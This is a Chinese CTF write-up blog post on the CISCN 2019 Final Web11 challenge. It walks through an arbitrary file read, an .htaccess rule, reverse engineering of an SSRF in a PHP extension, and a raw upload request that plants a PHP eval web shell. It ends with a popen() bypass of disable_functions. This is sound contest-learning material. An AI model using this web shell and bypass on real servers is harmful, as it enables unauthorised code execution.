<!DOCTYPE html><html lang="zh-CN"><head><meta name="generator" content="Hexo 3.8.0"><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="black-translucent" name="apple-mobile-web-app-status-bar-style"><meta content="telephone=no" name="format-detection"><meta name="description"><title>CISCN 2019 Final Web11 赛后复盘 | Patrilic's blog</title><link rel="stylesheet" type="text/css" href="/css/style.css?v=0.0.0"><link rel="stylesheet" type="text/css" href="//lib.baomitu.com/normalize/8.0.1/normalize.min.css"><link rel="stylesheet" type="text/css" href="//lib.baomitu.com/pure/1.0.0/pure-min.css"><link rel="stylesheet" type="text/css" href="//lib.baomitu.com/pure/1.0.0/grids-responsive-min.css"><link rel="stylesheet" href="//lib.baomitu.com/font-awesome/4.7.0/css/font-awesome.min.css"><script type="text/javascript" src="//lib.baomitu.com/jquery/3.4.0/jquery.min.js"></script><link rel="icon" mask sizes="any" href="/favicon.ico"><link rel="Shortcut Icon" type="image/x-icon" href="/favicon.ico"><link rel="apple-touch-icon" href="/apple-touch-icon.png"><link rel="apple-touch-icon-precomposed" href="/apple-touch-icon.png"><link rel="alternate" type="application/atom+xml" href="/atom.xml"></head><body><div class="body_container"><div id="header"><div class="site-name"><h1 class="hidden">CISCN 2019 Final Web11 赛后复盘</h1><a id="logo" href="/.">Patrilic's blog</a><p class="description">不忘初心</p></div><div id="nav-menu"><a class="current" href="/."><i class="fa fa-home"> 首页</i></a><a href="/archives/"><i class="fa fa-archive"> 归档</i></a><a href="/2019/04/01/Hello/"><i class="fa fa-user"> 关于</i></a><a href="/atom.xml"><i class="fa fa-rss"> 订阅</i></a></div></div><div class="pure-g" id="layout"><div class="pure-u-1 pure-u-md-3-4"><div class="content_container"><div class="post"><h1 class="post-title">CISCN 2019 Final Web11 赛后复盘</h1><div class="post-meta">Jul 28, 2019<span> | </span><span class="category"><a href="/categories/Write-up/">Write-up</a></span><script src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" async></script><span id="busuanzi_container_page_pv"> | <span id="busuanzi_value_page_pv"></span><span> 阅读</span></span></div><a class="disqus-comment-count" data-disqus-identifier="2019/07/28/CISCN 2019 Final Web11/" href="/2019/07/28/CISCN 2019 Final Web11/#disqus_thread"></a><div class="clear"><div class="toc-article" id="toc"><div class="toc-title">文章目录</div><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#题目信息"><span class="toc-number">1.</span> <span class="toc-text">题目信息</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Write-up"><span class="toc-number">2.</span> <span class="toc-text">Write up</span></a></li></ol></div></div><div class="post-content"><blockquote>
<p>@Author: Patrilic<br>@Time: 2019-07-18 11:20:33<br><img src="/wallpaper/[41576]「　ねぇ、」-64710934.jpg" alt><br>比赛的时候熬了一万年，只看到了一个本地请求，都不知道这个ssrf怎么利用，哎，还是要好好学逆向(吐血)</p>
</blockquote>
<h2 id="题目信息"><a href="#题目信息" class="headerlink" title="题目信息"></a>题目信息</h2><p>题目链接：<a href="http://web65.buuoj.cn/" target="_blank" rel="noopener">http://web65.buuoj.cn/</a> (推一手北联合师傅的平台)<br>题目源码：<a href="https://github.com/imagemlt/CISCN_2019_final_pmarkdown.git" target="_blank" rel="noopener">https://github.com/imagemlt/CISCN_2019_final_pmarkdown.git</a></p>
<h2 id="Write-up"><a href="#Write-up" class="headerlink" title="Write up"></a>Write up</h2><p>上传文件显示只能localhost上传，并且使用$SERVER[‘Remote-addr’]来获取ip<br>感觉只能采用ssrf之类的方式去上传文件，但是一直没get到点</p>
<p><a href="http://web65.buuoj.cn/index.php?act=post&amp;md=readme.md" target="_blank" rel="noopener">http://web65.buuoj.cn/index.php?act=post&amp;md=readme.md</a><br>md参数存在任意文件读取，可以利用php伪协议读源码<br><img src="/CISCN 2019 Final Web11.resources/D3CBF586-E936-4124-93C5-A89366265174.png" alt="7d9e6b80be391556be25e272dcb649f8"></p>
<p>然而并没有什么用，比赛的时候就一直卡在这里。<br>一直在想怎么去绕过，然后比赛给了提示：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">1. SSRF</span><br><span class="line">2. .htaccess</span><br></pre></td></tr></table></figure></p>
<p>.htaccess可以看到他让.md格式解析成了php<br><img src="/CISCN 2019 Final Web11.resources/7D9338F3-6F65-468B-9691-352B58498516.png" alt="25da9c8a3e1d8a088353b5d55747884a"></p>
<p>但是ssrf又怎么去看呢，源码里肯定没有，问题应该出在.so文件里<br>post.php里调用了 <strong>pmark_include()</strong> 函数<br><img src="/CISCN 2019 Final Web11.resources/58BBF5BD-2025-44D1-971A-B1F7AFADA63E.png" alt="7f5b593808f423764660307f15744e2a"></p>
<p>而在readme.md里是能把so文件下下来的<br>打开IDA分析一波</p>
<p>sub_1850里存在一个Http包，会以127.0.0.1的身份去request<br><img src="/CISCN 2019 Final Web11.resources/3472965F-EB2A-4FBC-9ACF-6D3D2D6DFB49.png" alt="0bb9f4775d2531e018e23f72e2803950"></p>
<p>往上找调用<br><img src="/CISCN 2019 Final Web11.resources/96DC7631-995E-46AB-B7FF-157D53503E90.png" alt="53e4cf1d179c5eb62ff8d33bc810f35d"><br><img src="/CISCN 2019 Final Web11.resources/3A9A08B0-404E-4783-BE8A-AFF0428FB826.png" alt="361977c811b801c48c5a73dd4e2c51a8"><br><img src="/CISCN 2019 Final Web11.resources/7774A215-1CC3-4998-AAA6-552A05DD86E4.png" alt="33f0b7885e41503a3a65a1ec8ddb08f2"><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">int zend_hash_find ( HashTable* ht, char* arKey, uint nKeyLength, void** pData )</span><br></pre></td></tr></table></figure></p>
<p>v15: debug</p>
<p>参数为debug,利用ssrf上传即可</p>
<p>所以可以直接构造payload:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">POST /upload.php HTTP/1.1</span><br><span class="line">Host: 127.0.0.1:8080</span><br><span class="line">User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:66.0) Gecko/20100101 Firefox/66.0</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</span><br><span class="line">Accept-Language: zh,en-US;q=0.7,en;q=0.3</span><br><span class="line">Referer: http://127.0.0.1:8080/index.php?act=upload</span><br><span class="line">Content-Type: multipart/form-data; boundary=---------------------------6693638881479522630623693797</span><br><span class="line">Content-Length: 244</span><br><span class="line">Connection: close</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line"></span><br><span class="line">-----------------------------6693638881479522630623693797</span><br><span class="line">Content-Disposition: form-data; name=&quot;file&quot;; filename=&quot;test.php&quot;</span><br><span class="line">Content-Type: text/php</span><br><span class="line"></span><br><span class="line">&lt;?php</span><br><span class="line">eval($_REQUEST[a]);</span><br><span class="line"></span><br><span class="line">-----------------------------6693638881479522630623693797--</span><br></pre></td></tr></table></figure></p>
<p>利用popen()绕过disabled_function<br><img src="/CISCN 2019 Final Web11.resources/94B8FADA-439F-4570-AFFB-44DF3A46FF86.png" alt="6107013d4772477cccc8e3fa7092f23b"></p>
<p><img src="/CISCN 2019 Final Web11.resources/F8097A0E-B573-4829-845E-0430F080DEB4.png" alt="ae389cb740da2a425e80d4d3a9b8d851"></p>
</div><div class="tags"><a href="/tags/CTF/">CTF</a></div><div class="post-nav"><a class="pre" href="/2019/08/14/初识威胁情报/">初识威胁情报</a><a class="next" href="/2019/07/18/Phishing Attack - 文件落地/">Phishing Attack - 文件落地</a></div><div id="disqus_thread"><div class="btn_click_load"><button class="disqus_click_btn">阅读评论（请确保 Disqus 可以正常加载）</button></div><script type="text/javascript">var disqus_config = function () {
    this.page.url = 'http://patrilic.top/2019/07/28/CISCN 2019 Final Web11/';
    this.page.identifier = '2019/07/28/CISCN 2019 Final Web11/';
    this.page.title = 'CISCN 2019 Final Web11 赛后复盘';
  };</script><script type="text/javascript" id="disqus-lazy-load-script">$.ajax({
url: 'https://disqus.com/next/config.json',
timeout: 2500,
type: 'GET',
success: function(){
  var d = document;
  var s = d.createElement('script');
  s.src = '//Patrilic.disqus.com/embed.js';
  s.setAttribute('data-timestamp', + new Date());
  (d.head || d.body).appendChild(s);
  $('.disqus_click_btn').css('display', 'none');
},
error: function() {
  $('.disqus_click_btn').css('display', 'block');
}
});</script><script type="text/javascript" id="disqus-click-load">$('.btn_click_load').click(() => {  //click to load comments
    (() => { // DON'T EDIT BELOW THIS LINE
        var d = document;
        var s = d.createElement('script');
        s.src = '//Patrilic.disqus.com/embed.js';
        s.setAttribute('data-timestamp', + new Date());
        (d.head || d.body).appendChild(s);
    })();
    $('.disqus_click_btn').css('display','none');
});</script><script type="text/javascript" id="disqus-count-script">$(function() {
     var xhr = new XMLHttpRequest();
     xhr.open('GET', '//disqus.com/next/config.json', true);
     xhr.timeout = 2500;
     xhr.onreadystatechange = function () {
       if (xhr.readyState === 4 && xhr.status === 200) {
         $('.post-meta .post-comments-count').show();
         var s = document.createElement('script');
         s.id = 'dsq-count-scr';
         s.src = 'https://Patrilic.disqus.com/count.js';
         s.async = true;
         (document.head || document.body).appendChild(s);
       }
     };
     xhr.ontimeout = function () { xhr.abort(); };
     xhr.send(null);
   });
</script></div></div></div></div><div class="pure-u-1-4 hidden_mid_and_down"><div id="sidebar"><div class="widget"><form class="search-form" action="//www.google.com/search" method="get" accept-charset="utf-8" target="_blank"><input type="text" name="q" maxlength="20" placeholder="Search"><input type="hidden" name="sitesearch" value="http://patrilic.top"></form></div><div class="widget"><div class="widget-title"><i class="fa fa-folder-o"> 分类</i></div><ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/ATT-CK/">ATT&CK</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/BypassUac/">BypassUac</a><span class="category-list-count">2</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Diary/">Diary</a><span class="category-list-count">2</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Red-Team-Tricks/">Red-Team Tricks</a><span class="category-list-count">6</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/SQLi-Tricks/">SQLi Tricks</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Skills/">Skills</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Threat-Intelligence/">Threat Intelligence</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Write-up/">Write-up</a><span class="category-list-count">7</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/linux/">linux</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/漏洞复现/">漏洞复现</a><span class="category-list-count">7</span></li></ul></div><div class="widget"><div class="widget-title"><i class="fa fa-star-o"> 标签</i></div><div class="tagcloud"><a href="/tags/内网渗透/" style="font-size: 15px;">内网渗透</a> <a href="/tags/Backdoor/" style="font-size: 15px;">Backdoor</a> <a href="/tags/BlueKeep/" style="font-size: 15px;">BlueKeep</a> <a href="/tags/Windows提权/" style="font-size: 15px;">Windows提权</a> <a href="/tags/DLL-Hijacking/" style="font-size: 15px;">DLL Hijacking</a> <a href="/tags/代码审计/" style="font-size: 15px;">代码审计</a> <a href="/tags/n1ctf-pentest/" style="font-size: 15px;">n1ctf-pentest</a> <a href="/tags/CTF/" style="font-size: 15px;">CTF</a> <a href="/tags/proc/" style="font-size: 15px;">proc</a> <a href="/tags/SQL注入/" style="font-size: 15px;">SQL注入</a> <a href="/tags/Struts2/" style="font-size: 15px;">Struts2</a> <a href="/tags/文件上传/" style="font-size: 15px;">文件上传</a> <a href="/tags/Git/" style="font-size: 15px;">Git</a> <a href="/tags/威胁情报/" style="font-size: 15px;">威胁情报</a> <a href="/tags/命令执行/" style="font-size: 15px;">命令执行</a></div></div><div class="widget"><div class="widget-title"><i class="fa fa-external-link"> 友情链接</i></div><ul></ul><a href="https://balis0ng.com" title="神仙学长balis0ng" target="_blank">神仙学长balis0ng</a><ul></ul><a href="https://evi1cg.me/" title="evi1cg's Blog" target="_blank">evi1cg's Blog</a><ul></ul><a href="http://hpdoger.cn" title="全寝室最sao的Hpdoger" target="_blank">全寝室最sao的Hpdoger</a><ul></ul><a href="http://0day.design" title="很多Q币的Passer6y" target="_blank">很多Q币的Passer6y</a><ul></ul><a href="http://adm1n.design" title="艺术家Hu3sky" target="_blank">艺术家Hu3sky</a><ul></ul><a href="https://0xa1paca.github.io" title="长发小哥0xa1paca" target="_blank">长发小哥0xa1paca</a><ul></ul><a href="http://noel.xin/" title="Noel's Blog" target="_blank">Noel's Blog</a><ul></ul><a href="https://www.0akarma.com" title="全能选手0aKarmA" target="_blank">全能选手0aKarmA</a><ul></ul><a href="https://www.cnblogs.com/H4lo" title="海大的IOT&amp;Pwn师傅H4lo" target="_blank">海大的IOT&amp;Pwn师傅H4lo</a><ul></ul><a href="https://www.kingkk.com/" title="Kingkk's Blog" target="_blank">Kingkk's Blog</a></div></div></div><div class="pure-u-1 pure-u-md-3-4"><div id="footer">Copyright © 2019 <a href="/." rel="nofollow">Patrilic's blog.</a> Powered by<a rel="nofollow" target="_blank" href="https://hexo.io"> Hexo.</a><a rel="nofollow" target="_blank" href="https://github.com/tufu9441/maupassant-hexo"> Theme</a> by<a rel="nofollow" target="_blank" href="https://github.com/pagecho"> Cho.</a></div></div></div><a class="show" id="rocket" href="#top"></a><script type="text/javascript" src="/js/totop.js?v=0.0.0" async></script><script type="text/javascript" src="//lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js" async></script><script type="text/javascript" src="/js/fancybox.js?v=0.0.0" async></script><link rel="stylesheet" type="text/css" href="//lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css"><script type="text/javascript" src="/js/codeblock-resizer.js?v=0.0.0"></script><script type="text/javascript" src="/js/smartresize.js?v=0.0.0"></script></div><script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","model":{"jsonPath":"/live2dw/assets/koharu.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":true},"log":false,"tagMode":false});</script></body></html>